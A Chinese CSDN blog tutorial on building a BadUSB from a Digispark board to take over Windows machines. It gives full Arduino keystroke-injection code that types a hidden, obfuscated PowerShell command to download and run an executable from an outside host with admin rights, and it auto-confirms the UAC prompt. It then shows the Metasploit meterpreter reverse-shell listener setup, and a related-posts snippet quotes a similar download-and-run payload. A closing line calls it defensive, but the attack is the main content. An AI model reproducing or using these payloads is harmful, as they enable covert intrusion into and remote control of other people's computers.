Badusb制作及使用(渗透windows)

已于 2022-07-11 11:05:23 修改
阅读量6.1k 收藏 93
点赞数 8
分类专栏: kali 文章标签: 安全
于 2022-06-19 21:52:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QQ670663/article/details/125362082
版权

目录

一、安装Dpinst驱动

二、配置Automator

三、实现插入Babusb远程渗透windows系统

“BadUSB”是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在BlackHat安全大会上公布。

BadUSB最可怕的一点是恶意代码存在于U盘的固件中,由于PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB进行攻击。

BadUSB原理

BadUSB出现之前,利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击的两种类型。分别是"USB rubberducky"和"Teensy"。

什么是USB rubberducky?

简称USB橡皮鸭,是最早的按键注入工具,通过嵌入式开发板实现,后来发展成为一个完全成熟的商业化按键注入攻击平台。它的原理同样是将USB设备模拟成为键盘,让电脑识别成为键盘,然后进行脚本模拟按键进行攻击。

什么是Teensy?

攻击者在定制攻击设备时,会向USB设备中置入一个攻击芯片,此攻击芯片是一个非常小而且功能完整的单片机开发系统,它的名字叫TEENSY。通过TEENSY你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘,利用设备中的微处理器与存储空间和编程进去的攻击代码,就可以向主机发送控制命令,从而完全控制主机,无论自动播放是否开启,都可以成功。

Digispark USB Development Board是一块基于ATTiny85微控制器的开发板。

BadUSB是USB的一款严重漏洞。攻击者可利用该缺陷,在有效且不被检测到的情况下,执行恶意代码。

所需工具:DPinst(badusb驱动)、Automator(脚本代码生成工具)、arduino(脚本代码烧录工具)、notepad(代码编辑工具)、

网址:https://nixu-corp.github.io/(代码转换网址)、https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads(脚本代码网址)

链接: https://pan.baidu.com/s/1j11XNhpVM9K_C6AVoG_Qsg  密码: 6k3l

一、安装Dpinst驱动

1、安装驱动

64位操作系统安装选择DPinst64,32位操作系统选择DPinst打开Digistump文件夹-DPinst64.exe

下一步-安装(勾选始终信任来自“Digistump LLC的软件”)

 

二、配置Automator

1、安装Didispark-attint85开发板,Arduino没有自带所以需要到开发板管理器下载

文件-首选项

 

2、附加开发版管理网址:http://digistump.com/package_digistump_index.json

3、依次点击:工具-开发板-开发板管理

4、找到Digistump AVR Boards by Digistump后选择-安装 (注意:因开发板管理网址为国外网址所以安装开发板时需要开代理也就是梯子) 

 

5、digispark开发板安装完成后点击:工具-开发板-Digispark(Default-16.5mhz) 

6、设置编程器为:USBtinyISP

点击:工具-编程器- USBtinyISP

 

 7、文件-示例-DigisparkKeybosrd-Keyboard

 8、输入代码编译完成后选择上传,60秒内插入BadUSB开发板

9、提示上传成功即代码成功烧录到BadUSB开发版中 

10、使用Automator编写键盘鼠标事件代码。简单演示一下插入Badusb后自动打开计算器。

11、把Automator生成的代码复制到Arduino;点击上传按钮60秒内插入badusb盘(等待几秒写入完成即可拔出badusb盘)

12、写入成功提示Thank you

插入写入代码完成的badusb盘演示: 

1、

2、

3、

三、实现插入Babusb远程渗透windows系统

powershell远程下载并自动执行木马程序代码:

#include "DigiKeyboard.h"

void setup() {

  pinMode(1, OUTPUT);//可用可不用

  DigiKeyboard.sendKeyStroke(0);//初始化

  delay(3000);//延时

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//WIN+R

  delay(500);

  DigiKeyboard.sendKeyStroke(0);

  //delay(500);

  //DigiKeyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2");

  delay(500);

  DigiKeyboard.println("POWERSHELL -NOP -W HIDDEN -C \"sTART-pROCESS -fILEpATH POWERSHELL.EXE \'-NOP -W HIDDEN -C iNVOKE-wEBrEQUEST -URI HTTP://BADUSB.PW/1.EXE -oUTfILE C:\\X.EXE;C:\\X.EXE\' -vERB RUNAS\"");//尽量其他盘 更改HTTP://BADUSB.PW/1.EXE为你程序的下载直连

  DigiKeyboard.println();

  delay(4500);

  DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT); //ALT+Y键 用于需要按管理员确定

}



void loop() {

  //这里只是让灯亮

  digitalWrite(1, HIGH);

  delay(100);               // wait for a second

  digitalWrite(1, LOW);

  delay(500);

  digitalWrite(1, HIGH);

  delay(100);               // wait for a second


}

1、点击上传60秒内插入Badusb盘等待几秒时间写入成功

2、写入成功提示Thank you

 

 3、准备MSF控制端

打开Kali系统—打开终端

打开msf设置payload,加载攻击模块设置本地IP和监听端口

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.245.140

set LPORT 4444

show options (查看IP端口设置情况)

run (开启监听)

4、Budusb插入目标机自动下载并且运行木马-反弹shell-操控目标机 

视频演示​​​​​​​:​​​​​​1655646347015765-CSDN直播

本教材仅用于信息安全防范,提高信息安全意识,请勿用于其他用途,请且行且珍惜。 

༺࿈思绪࿈༻
关注
  • 8
    点赞
  • 93
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2441
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
系统安全-BadUsb代码以及木马远控的制作(可绕过360)
Coisini的博客
05-31 9157
漏洞背景 是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作…. 硬件准备 这里我们使用的是: BS Micro pro micro leona...
BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具
Jason Xu 的博客
04-10 5832
说明 本文章仅供学习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
BadUSB制作教程
weixin_40485904的博客
02-04 1714
BadUSB制作教程BadUSB的优点制作BadUSB的几种板子那么来做一个BadUSB怎么样? 和大多数人一样,最初见到BadUSB是在美剧《黑客军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。 剧情中使用Hak5的USB rubber ducky控制目标主机 达琳在停车场扔BadUSB钓鱼 BadUSB的优点 在USB攻击领域,很多年前常用的是老式USB病毒autorun.inf,
BadUsb制作
最新发布
weixin_43893278的博客
03-09 550
badusb制作
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 4018
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
Bad usb实现U盘攻击
qq_40624810的博客
09-18 7151
1、Bad usb介绍及原理 介绍 BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。用户插入BadUSB,就会自动执行预置在固件中的恶意代码,如下载服务器上的恶意文件,执行恶意操作等。由于恶意代码内置于设备初始化固件中,而不是通过autorun.inf等媒体自动播放文件进行控制,因此无法通过禁用媒体自动播放进行防御,杀毒软件更是无法检测设备固件中的恶意代码。这种攻击方式可以在不经意...
最新版本的网卡版BadUSB 橡皮鸭 (功能强大)
nn_84的博客
01-27 407
链接: https://pan.baidu.com/s/1LDUy9B7TFLUSaHkzYL4Zrw?我们需要 pi zero w 和 usb扩展板。写好sd卡 就可以用。
BadUsb程序大全-值得收藏
门柚的博客
07-31 1601
BadUsb程序大全-值得收藏
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
badusb.zip_bad usb_badusb_badusb下载_badusb制作教程_badusb脚本开发
09-21
【描述】中的"badusb制作工具包"表明,这个压缩包可能包含用于研究或教学目的的BadUSB工具和教程。"需要自行打包带走"暗示用户需要自己处理和理解这些工具,可能涉及到编译、配置或定制化的过程,需要一定的技术背景...
badusb_badusb_
09-29
【标题】:“badusb_badusb_”:深入理解BadUSB及其威胁 【描述】:“badusb资料,需要自行打包带走” 提示了本压缩包包含了关于BadUSB的相关研究和资料,BadUSB是一种针对USB设备的恶意攻击手段,它利用USB设备的...
badusb代码daquan.zip
06-22
【标题】"badusb代码daquan.zip" 涉及的核心知识点是BadUSB攻击与代码实现,这是一类利用USB设备固件漏洞进行恶意活动的技术。BadUSB是一种信息安全威胁,它利用USB设备的可编程性,将普通USB设备(如U盘)转变为...
stm32 badusb
11-01
STM32 BadUSB是一个利用STM32F103C8T6微控制器制作USB设备,该设备能够模拟各种USB设备类型,如键盘、鼠标甚至存储设备,从而实现特定的功能或进行安全测试。BadUSB的概念源自于对USB设备安全性的担忧,它可以被...
badusb代码.zip
07-25
【描述】:“分享一款badusb的代码,测试过还是可以正常使用。”这说明压缩包中的代码已经被验证过,能够成功运行并实现BadUSB攻击的功能。BadUSB攻击通常涉及修改USB设备的固件,使设备在插入计算机时执行预设的...
BadUSB教程
Canicula_1的博客
10-07 2226
BadUSB环境配置教程 可以解决的问题包括: 编译时最后出现:exit status 1 DigiKeyboard.h对应多个库-----这个搜索电脑里的这个库,除了使用编辑器文件夹下的,统统删掉。 1、文件-首选项-开发板网址: http://digistump.com/package_digistump_index.json 2、在编辑器对应的库中添加文件 Digis...
badusb代码_BadUSB轻松绕过防护拿下小姐姐的电脑
weixin_39760689的博客
11-28 1232
前言我是掌控安全学院的魔术手,最近公司其他部门招了很多小姐姐,基本都没啥安全意识,电脑离开公司也不关的那种,某一天脑子一抽想着怎么能快速拿下对方的电脑(电脑不关直接创建用户没意思),寻思怎么快速上一个木马,通过msf等生成免杀马感觉没啥意思,还要忽悠人家,影响我形象,于是就想到用一些手边的硬件来实现。手上有一个badusb和raspberry zero w。其中raspberry zer...
【网络安全】用badusb控制局域网PC的webcam
ns2250225
04-01 2940
声明 本文仅限学习交流使用,切勿做任何违法的行为 材料准备 badusb一枚,我用的是Arduino Pro Micro(Atmega32U4)改造而成 kail linux系统PC win10系统PC Kail linux端 下载Payload生成脚本 git clone https://github.com/christofersimbar/Arduin...
SEToolkit + badusb
07-25
SEToolkit + badusb是一种攻击方法,它利用了BadUSB的原理来实现PowerShell注入攻击。SEToolkit是一个开源的渗透测试工具包,而badusb则是指利用USB固件漏洞的攻击方式。通过使用SEToolkit和badusb,攻击者可以重新编程USB设备,使其充当人机交互设备,并在受害者的计算机上执行恶意命令或运行恶意程序。这种攻击方法在黑客社区中被广泛使用,因为它具有隐蔽性和灵活性,可以绕过传统的安全防护措施。然而,这种攻击方法也需要攻击者具备一定的技术知识和实施能力。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [badusb详细制作教程(两种方式实现远控)](https://blog.csdn.net/Ghost_system/article/details/126383082)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

༺࿈思绪࿈༻

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值